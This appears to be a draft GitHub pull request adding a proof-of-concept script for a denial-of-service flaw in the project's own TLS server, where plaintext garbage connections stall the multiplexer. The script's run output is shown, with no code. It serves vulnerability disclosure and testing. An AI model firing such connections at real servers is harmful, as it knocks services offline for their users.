
PoC for TLS server multiplexer stall on failed SSL_accept #9

Draft
nbolton wants to merge 2 commits into main from poc/tls-dos

@nbolton nbolton commented Apr 28, 2026

I found a vulnerability where a TLS server can be DoS'd by a non-TLS client. This PoC proves it.

$ scripts/security/poc/cve_XXXX_XXXXX_tls_dos.py

CVE-XXXX-XXXXX — TLS multiplexer stall on failed SSL_accept
target: 127.0.0.1:24800  stalls: 5

[*] collecting baseline hello rtt (no attack)
  baseline hello rtt: 8 ms
  baseline hello rtt: 5 ms
  baseline hello rtt: 5 ms
  baseline median: 5 ms

[*] firing 5 plaintext garbage connections
[*] measuring hello rtt during attack
  attack hello rtt: 4957 ms

  attack median: 4957 ms
  overhead:      4951 ms (threshold 2500 ms)
[FAIL] multiplexer stalled by 4951 ms — VULNERABLE (CVE-XXXX-XXXXX)

To do

  • Rename PoC script when we have a CVE

@nbolton nbolton requested a review from sithlord48 April 28, 2026 10:50
@nbolton nbolton changed the title from "feat: add PoC for TLS server multiplexer stall on failed SSL_accept" to "PoC for TLS server multiplexer stall on failed SSL_accept" Apr 28, 2026